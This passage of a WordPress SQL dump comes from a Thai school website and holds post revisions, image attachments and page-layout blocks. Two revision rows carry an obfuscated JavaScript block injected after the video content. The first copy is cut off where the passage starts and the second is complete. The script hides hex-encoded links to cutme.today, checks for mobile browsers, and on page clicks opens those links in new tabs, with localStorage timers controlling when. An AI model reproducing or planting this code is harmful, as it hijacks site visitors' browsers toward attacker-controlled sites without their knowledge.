_0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วิดีโอกิจกรรม จิตอาสา พี่เพื่อน้อง','','inherit','closed','closed','','285-revision-v1','','','2024-07-31 21:48:48','2024-07-31 14:48:48','',285,'http://pakhaeng.ssk.in.th/?p=315',0,'revision','',0),
(316,1,'2024-07-31 21:52:00','2024-07-31 14:52:00','','จิตอาสา','','inherit','','closed','','%e0%b8%88%e0%b8%b4%e0%b8%95%e0%b8%ad%e0%b8%b2%e0%b8%aa%e0%b8%b2-3','','','2024-07-31 21:52:00','2024-07-31 14:52:00','',285,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/จิตอาสา.png',0,'attachment','image/png',0),
(317,1,'2024-07-31 21:52:47','2024-07-31 14:52:47','','1 กรกฏาคม วันสถาปนาลูกเสือแห่งชาติ ประวัติและความเป็นมา','','inherit','','closed','','1-%e0%b8%81%e0%b8%a3%e0%b8%81%e0%b8%8f%e0%b8%b2%e0%b8%84%e0%b8%a1-%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%96%e0%b8%b2%e0%b8%9b%e0%b8%99%e0%b8%b2%e0%b8%a5%e0%b8%b9%e0%b8%81%e0%b9%80%e0%b8%aa-2','','','2024-07-31 21:52:47','2024-07-31 14:52:47','',275,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/1-กรกฏาคม-วันสถาปนาลูกเสือแห่งชาติ-ประวัติและความเป็นมา.png',0,'attachment','image/png',0),
(318,1,'2024-07-31 21:54:41','2024-07-31 14:54:41','','โรงเรียนบ้านหนองปลาเข็ง กอไหล่','','inherit','','closed','','%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%9a%e0%b9%89%e0%b8%b2%e0%b8%99%e0%b8%ab%e0%b8%99%e0%b8%ad%e0%b8%87%e0%b8%9b%e0%b8%a5%e0%b8%b2%e0%b9%80%e0%b8%82%e0%b9%87-2','','','2024-07-31 21:54:41','2024-07-31 14:54:41','',292,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านหนองปลาเข็ง-กอไหล่-1.png',0,'attachment','image/png',0),
(319,1,'2024-07-31 21:54:51','2024-07-31 14:54:51','<!-- wp:paragraph -->\n<p>สุขาดี มีความสุข</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:video {\"id\":293} -->\n<figure class=\"wp-block-video\"><video autoplay controls src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/441527005_441923068779713_3712436577410634971_n.mp4\"></video></figure>\n<!-- /wp:video -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วิดีโอกิจกรรม สุขาดี มีความสุข','','inherit','closed','closed','','292-revision-v1','','','2024-07-31 21:54:51','2024-07-31 14:54:51','',292,'http://pakhaeng.ssk.in.th/?p=319',0,'revision','',0),
(321,1,'2024-08-01 09:27:55','2024-08-01 02:27:55','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0